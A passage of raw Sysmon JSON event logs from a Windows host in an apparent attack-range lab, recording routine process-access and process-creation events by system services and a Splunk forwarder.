05:56:55.461","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0427-5F25-0000-00108D960B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.555\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0427-5F25-0000-0010C3990B00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.555","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0427-5F25-0000-0010C3990B00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.555\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0427-5F25-0000-0010C3990B00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.555","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0427-5F25-0000-0010C3990B00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.555\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0427-5F25-0000-0010C3990B00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.555","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0427-5F25-0000-0010C3990B00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nProcessGuid: {A837DB8D-0427-5F25-0000-0010BC9C0B00}\r\nProcessId: 4488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","ProcessGuid":"{A837DB8D-0427-5F25-0000-0010BC9C0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.696","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.696\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 